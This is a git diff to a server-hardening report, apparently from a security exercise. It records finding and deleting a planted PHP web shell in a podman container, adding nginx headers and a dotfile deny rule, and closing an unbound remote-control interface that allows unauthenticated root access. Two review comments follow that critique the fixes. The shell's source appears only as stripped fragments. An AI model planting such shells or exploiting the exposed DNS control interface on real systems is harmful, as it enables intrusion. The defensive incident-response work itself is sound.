diff --git a/report/Report.md b/report/Report.md index 683c5ff..c792283 100644 --- a/report/Report.md +++ b/report/Report.md 
@@ -274,6 +274,90 @@ server { ``` Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game. +Lets enable xss protection in the nginx configuration. + +```bash +location /2048/ { + proxy_pass http://localhost:8018/; + proxy_set_header Host $host; + # Add security headers + add_header X-Frame-Options "SAMEORIGIN"; + add_header X-Content-Type-Options "nosniff"; + add_header X-XSS-Protection "1; mode=block"; +} +``` + +And deny access to the all `.` files. + +```bash +location ~ /\. { + deny all; +} +``` + +The process is run by the `conmon` process. + +```bash +root@ls-2024-9:~# sudo lsof -i :8018 +COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME +conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN) + +root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg 
--tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 +``` + +It is a podman container. + +```bash +root@ls-2024-9:~# podman ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048 +root@ls-2024-9:~# +``` + +When going into the container we can see the php reverse shell script. + +```bash +root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash +root@4d05d4a1a404:/var/www/html# ls +app.js assets index.html manifest.json service-worker.js shell.php style.css +root@4d05d4a1a404:/var/www/html# cat shell.php + + + + + + CMD + + + +


+
+
+ + +
+
+


+ &1')); + } + ?> + +root@4d05d4a1a404:/var/www/html# +``` + +Lets remove the file now. + +```bash +podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php +``` ### Already f-up something @@ -378,3 +462,24 @@ Host ls2024_prep ### DNS +Problem here is that remote control is enabled and we can use it to get the root shell. + +```txt +root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf +# default unbound control +remote-control: + control-enable: yes + control-interface: ::0 + control-use-cert: no +``` + +Lets disable remote control completely. and restart the service. + +```bash +root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound +``` + +This is all I found suspicious in the DNS configuration. + + +
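Review bot: The cleanup step at the end of the first hunk, `podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php`, only deletes the file from the running container's writable layer; the container is started from `docker.io/nejec/2048:latest` and the conmon command line shows it is launched with `--rm`, so if `shell.php` is part of the image it comes straight back on the next restart. The report should state whether the file came from the image or was dropped at runtime (inspect the image layers, or compare against a fresh container from the same image), and a copy of the file should be preserved with `podman cp` before it is removed, since the deleted script is the only evidence of where the shell was connecting to. On the nginx part of the hunk: the three `add_header` lines are placed inside `location /2048/`, and nginx applies only the `add_header` directives of the innermost level that has any, so headers set in the parent `server` block will no longer be sent for this location; they are also only attached to 2xx/3xx responses unless `always` is appended. `X-XSS-Protection` is a legacy filter that current browsers ignore, so the comment "enable xss protection" overstates what these lines do; a `Content-Security-Policy` header is the control that actually addresses XSS. The `location ~ /\. { deny all; }` block also matches `/.well-known/`, which will break ACME renewals if this host uses them. Minor: the nginx snippets are fenced as `bash`, and "Lets" / "to the all `.` files" should read "Let's" / "to all dotfiles".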
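Review bot: The second hunk says "Lets disable remote control completely. and restart the service." but the only change shown is `systemctl restart unbound`; the edit to `remote-control.conf` (for example `control-enable: no`, or at least `control-interface: 127.0.0.1` together with `control-use-cert: yes`) is missing from the diff, so as written the restart reloads the same unsafe configuration. The report should include the modified file, since `control-interface: ::0` with `control-use-cert: no` is exactly the finding being fixed (unbound-control reachable from any address with no authentication), and it should show the verification step: `unbound-checkconf` before the restart and a listing of listening sockets afterwards confirming that port 8953 is no longer bound. The closing sentence "This is all I found suspicious in the DNS configuration" would be stronger if it recorded which other files in `unbound.conf.d` were reviewed.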